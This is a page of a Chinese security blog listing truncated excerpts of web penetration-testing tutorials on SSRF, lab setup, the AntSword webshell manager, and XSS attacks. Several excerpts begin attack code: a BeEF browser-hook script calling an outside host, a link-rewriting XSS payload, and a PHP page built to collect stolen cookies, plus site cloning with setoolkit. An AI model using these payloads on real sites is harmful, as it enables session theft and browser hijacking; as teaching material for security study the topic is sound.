安全共48篇 第2页
Web渗透-SSRF漏洞(二)|leon的博客

Web渗透-SSRF漏洞(二)

1.1 SSRF介绍 1.1.1 SSRF简介 SSRF(Server-Side Request Forgery,服务器端请求伪造)通过篡改HTTP请求中的资源地址发送给服务器,服务器没有校验请求的合法性就解析用户传递过来的请求,处理之...
Leon的博客的头像|leon的博客Leon的博客2年前
3400
PentesterLab靶场搭建|leon的博客

PentesterLab靶场搭建

1.1 PentesterLab靶场搭建 1.1.1 下载PentesterLab https://pentesterlab.com/exercises 找到相应的漏洞(只有free是免费下载)后进行下载,此处以XXL漏洞为例: 1.1.2 VMware使用ISO文件 下载...
Leon的博客的头像|leon的博客Leon的博客2年前
2180
中国蚁剑介绍|leon的博客

中国蚁剑介绍

1.1 中国蚁剑 1.1.1 蚁剑介绍 蚁剑(AntSword)是一款开源的跨平台WebShell管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 1.1.2 下载蚁剑 蚁剑源码:https://...
Leon的博客的头像|leon的博客Leon的博客2年前
3610
XSS漏洞-XSS攻击实例(十)|leon的博客

XSS漏洞-XSS攻击实例(十)

1.1 持久性XSS窃取用户信息 1.1.1 制作钓鱼网站 使用setoolkit克隆站点,setoolkit是一个万能的社工工具(社会工程学工具集合) [cce lang='bash']# setoolkit Do you agree to the terms of serv...
Leon的博客的头像|leon的博客Leon的博客2年前
3480
XSS漏洞-XSS攻击实例(九)|leon的博客

XSS漏洞-XSS攻击实例(九)

1.1 使用beef劫持用户浏览器 1.1.1 新建hook并启动apache [cce lang='bash']# vim /var/www/html/beef-xss.html <html> <head> <script src='http://192.168.10.180:3000/hook.j...
Leon的博客的头像|leon的博客Leon的博客2年前
2410
XSS漏洞-XSS攻击实例(八)|leon的博客

XSS漏洞-XSS攻击实例(八)

1.1 反射型XSS攻击劫持用户浏览器 1.1.1 构造攻击payload [cce lang='bash']<script> window.onload = function() { var link= document.getElementsByTagName('a'); for(j = 0; j < l...
Leon的博客的头像|leon的博客Leon的博客2年前
3221
XSS漏洞-XSS攻击实例(七)|leon的博客

XSS漏洞-XSS攻击实例(七)

1.1 窃取用户cookie信息保存到远程服务器 1.1.1 构建钓鱼网站接收cookie 页面中创建cookie变量,然后将cookie变量写入cookie.txt [cce lang='bash']# vim /var/www/html/diaoyu.php <?php $c...
Leon的博客的头像|leon的博客Leon的博客2年前
4141
XSS漏洞-XSS攻击方法总结(六)|leon的博客

XSS漏洞-XSS攻击方法总结(六)

1.1 XSS攻击常用编码 1.1.1 URL编码 url的设计者考虑到安全传输问题,防止url字符丢失,所以选用了相对较小的通用的安全字母表。另一方面url的设计者希望url是完整的,有时候需要url中包含除去...
Leon的博客的头像|leon的博客Leon的博客2年前
2640
XSS漏洞-手动挖掘(五)|leon的博客

XSS漏洞-手动挖掘(五)

1.1 Stage 13 CSS的IE特性伪协议注入XSS https://xss-quiz.int21h.jp/stage13_0.php?sid=1c9c607c40dc4863f84fe2bd8218c7ba4664721e 1.1.1 页面分析 1.1.1.1 分析过程 提示信息:样式属性 页面...
Leon的博客的头像|leon的博客Leon的博客2年前
2370
XSS漏洞-手动挖掘(四)|leon的博客

XSS漏洞-手动挖掘(四)

1.1 Stage 9 UTF-7编码注入XSS http://xss-quiz.int21h.jp/stage_09.php?sid=e65bbb1a82573cd9e16ad710a7d7a259226deecf 因为现在都使用UTF-8编码且没有ie7的环境而且当前漏洞在实际场景中几乎...
Leon的博客的头像|leon的博客Leon的博客2年前
2421